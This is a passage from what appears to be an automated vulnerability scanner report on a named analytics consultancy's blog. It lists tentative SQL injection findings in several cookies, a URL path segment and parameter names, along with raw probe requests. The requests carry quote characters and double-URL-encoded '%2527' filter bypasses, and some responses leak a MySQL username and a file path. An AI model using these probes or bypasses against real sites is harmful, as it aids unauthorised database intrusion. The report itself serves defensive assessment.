There is probably no need to perform a second URL-decode of the value of the ki_u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/62-urchin/75-convert-u5data-error-changing-directories.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:13:13 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:13:14 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:13:14 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22387


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<div>However, the documentation (at the time of writing this) fails to call out a common issue that I've seen coming up for a number of Urchin users: <strong>
...[SNIP]...

Request 2

GET /blog/62-urchin/75-convert-u5data-error-changing-directories.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:13:15 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Content-Length: 76
Connection: close
Content-Type: text/html

Database Error: Unable to connect to the database:Could not connect to MySQL

1.64. http://www.analyticspros.com/blog/62-urchin/87-visitor-scoring-with-urchin.html [1ee73a388da0bb7ec3d7afe3beccac53 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/87-visitor-scoring-with-urchin.html

Issue detail

The 1ee73a388da0bb7ec3d7afe3beccac53 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 1ee73a388da0bb7ec3d7afe3beccac53 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/62-urchin/87-visitor-scoring-with-urchin.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00'; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:11:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/62-urchin/87-visitor-scoring-with-urchin.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00''; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:11:46 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:11:48 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:11:48 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23268


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.65. http://www.analyticspros.com/blog/62-urchin/87-visitor-scoring-with-urchin.html [optimizelyEndUserId cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/87-visitor-scoring-with-urchin.html

Issue detail

The optimizelyEndUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyEndUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the optimizelyEndUserId cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/62-urchin/87-visitor-scoring-with-urchin.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:14:12 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/62-urchin/87-visitor-scoring-with-urchin.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169%2527%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:14:12 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.66. http://www.analyticspros.com/blog/62-urchin/88-urchin-vs-google-analytics.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/88-urchin-vs-google-analytics.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog'/62-urchin/88-urchin-vs-google-analytics.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 404 Component not found
Date: Sat, 06 Nov 2010 07:28:31 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 06 Nov 2010 07:28:32 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 3015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
<title>404 - Error: 404</title>
...[SNIP]...

Request 2

GET /blog''/62-urchin/88-urchin-vs-google-analytics.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:28:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.67. http://www.analyticspros.com/blog/62-urchin/88-urchin-vs-google-analytics.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/88-urchin-vs-google-analytics.html

Issue detail

The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/62-urchin/88-urchin-vs-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb'; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:06:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/62-urchin/88-urchin-vs-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb''; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:06:13 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=40a1140278fbef8b07f02061e9721c9c; path=/
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.68. http://www.analyticspros.com/blog/62-urchin/88-urchin-vs-google-analytics.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/88-urchin-vs-google-analytics.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/62-urchin/88-urchin-vs-google-analytics.html?itemid=70#comment&1'=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:25:54 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/62-urchin/88-urchin-vs-google-analytics.html?itemid=70#comment&1''=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:25:55 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:25:57 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:25:57 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29793


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.69. http://www.analyticspros.com/blog/62-urchin/94-exclude-bots-in-urchin.html [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/94-exclude-bots-in-urchin.html

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmz cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/62-urchin/94-exclude-bots-in-urchin.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:09:10 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/62-urchin/94-exclude-bots-in-urchin.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527%2527; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:09:12 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:09:15 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:09:15 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22465


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.70. http://www.analyticspros.com/blog/googleanalytics.feed [1ee73a388da0bb7ec3d7afe3beccac53 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics.feed

Issue detail

The 1ee73a388da0bb7ec3d7afe3beccac53 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 1ee73a388da0bb7ec3d7afe3beccac53 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the 1ee73a388da0bb7ec3d7afe3beccac53 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics.feed HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
